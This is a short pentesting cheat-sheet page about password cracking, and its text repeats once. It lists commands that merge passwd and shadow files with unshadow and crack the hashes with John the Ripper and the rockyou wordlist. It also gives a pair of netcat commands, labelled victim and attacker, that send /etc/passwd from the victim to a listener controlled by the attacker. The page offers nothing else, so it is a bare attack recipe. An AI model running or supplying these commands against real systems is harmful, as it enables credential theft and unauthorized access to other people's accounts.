passwords
// Some code
unshadow passwd shadow >full
john full --wordlist=/usr/share/wordlists/rockyou.txt
victim
nc ip 2222 </etc/passwd -w3
attacker
nc -lnvp 2222 > passwd123
Last updated
Was this helpful?
// Some code
unshadow passwd shadow >full
john full --wordlist=/usr/share/wordlists/rockyou.txt
victim
nc ip 2222 </etc/passwd -w3
attacker
nc -lnvp 2222 > passwd123
Last updated
Was this helpful?